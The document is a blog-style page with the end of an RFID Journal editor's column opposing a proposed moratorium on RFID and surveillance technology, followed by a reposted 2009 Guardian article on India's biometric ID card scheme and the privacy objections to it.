The fact is, enacting a moratorium on technology means ending technological advancement as we know it, because you can’t know the implications of a technology until you deploy it. If we had put a moratorium on the deployment and use of the Internet, would the people who studied it have envisioned the rise of social networking and come up with ways to protect privacy while allowing them to flourish? No, of course not—no one saw the phenomenon of social networking coming. Governments must allow technologies to be deployed and address problems as they arise. If we had done with the Internet what these groups are suggesting for RFID, there would be no Internet today—we’d still be studying its implications—and while there would have been greater privacy in the world, no one can argue the world would be better off.

The declaration’s description of RFID as a “mass surveillance” technology betrays the signatories’ bias. RFID could potentially be used as a surveillance technology, but that is definitely not how most companies are looking to deploy it (unless you consider asset- and inventory-tracking “surveillance”). Perhaps these groups are ignorant of the way RFID is being utilized, but I think there’s more to it than that: The people behind this civil society declaration just aren’t thinking very deeply about the issues.

These groups think privacy is good, and that any technology that could infringe on privacy is bad—and that’s a very simplistic view. Surveillance cameras are being used increasingly by governments around the world, and by retailers to reduce theft. These can be abused. Governments can, for instance, use cameras to track political enemies. But what if cameras bring down the overall crime rate in a troubled urban area, and enjoy the wholehearted support of those who live in that area? Are the cameras bad? Should they be removed, as the coalition suggests, until every possible implication of their use can be fully studied?

What if, heaven forbid, the daughter of one of the people behind the declaration were kidnapped on a street corner, or in the parking lot of a shopping mall? Would that person argue that the police should not review the tapes to see if the kidnapper could be identified, because other people might be identified as well, and that it would infringe on their privacy? If the tapes did reveal the identity of the kidnapper and the girl was rescued, would the signer still argue that there should be a moratorium on such surveillance technologies?

Technology issues are simple when you view them through the prism of your own biases, but the reality is that these issues are far more complex than opponents imagine, and it’s laughable to think a bunch of people can sit around and determine how or when new technologies should be used for the benefit of all mankind (Prometheus, after all, never anticipated that there would be arsonists). Let’s hope, for the good of humanity, that the calls for a moratorium go unanswered.

Mark Roberti is the founder and editor of RFID Journal.



1.2bn population of India to be given biometric ID cards

Sep 17th, 2009 | By Innovya follow-up | Category: Featured Posts, News

Randeep Ramesh in Delhi
guardian.co.uk, Wednesday 16 September 2009 20.33 BST
___________________________________________________________________________________________
In India, Big Brother just wants to help. The country’s 1.2 billion citizens are to be issued with a biometric identity card in an attempt to improve the delivery of India’s inefficient public services – a move civil liberties’ activists are condemning as the act of a “surveillance society”.

This month, the country began the ambitious scheme of issuing everyone with a unique identity number. Within the first five years of the scheme, giant computer servers will hold the personal details of at least 600 million people. The introduction of what will be one of the world’s most ambitious IT projects will cost an estimated £1.5bn.

The scheme is the brainchild of Nandan Nilekani, one of India’s best-known software tycoons and now head of the government’s Unique Identification Authority. “We are going to have to build something on the scale of Google but it will change the country … every person for first time [will] be able to prove who he or she was.”

The country’s red tape is legendary: Indians have dozens of types of identity verification, ranging from electoral rolls to ration cards, yet almost none can be used universally. The new system will be a national proof of identity, effective for everything, from welfare benefits to updating land records.

Nilekani said the scheme would help the poor especially. Moving from one state to another – a regular occurrence for poor villagers in search of work – often meant benefits were withdrawn because proof of residence was lacking. “This will mean maids and labourers … a hundred or two hundred million people – will be able to access welfare benefits for the first time without any questioning who they are.”

Eventually, cards will hold the person’s name, age, and birth date, as well as fingerprint or iris scans, though no caste or religious identification. “We are not profiling a billion people. This will provide an ID database which government can access online. There will be checks and balances to protect identities,” said Nilekani, who has also been in talks to create a personalised carbon account so that all Indians might buy “green technologies” using a government subsidy.

Doubts have been raised over privacy and the complex security needed to police such a system, as well as concerns that the project is just too ambitious. “We could have a hacking Olympics,” said Guru Malladi, a partner at Ernst & Young.

Civil liberty campaigners fear the card could be a tool of repression.

Nandita Haskar, a human rights lawyer, said: “There’s already no accountability in regard to violations of human and civil rights. In this atmosphere what are the oversight mechanisms for this kind of surveillance?”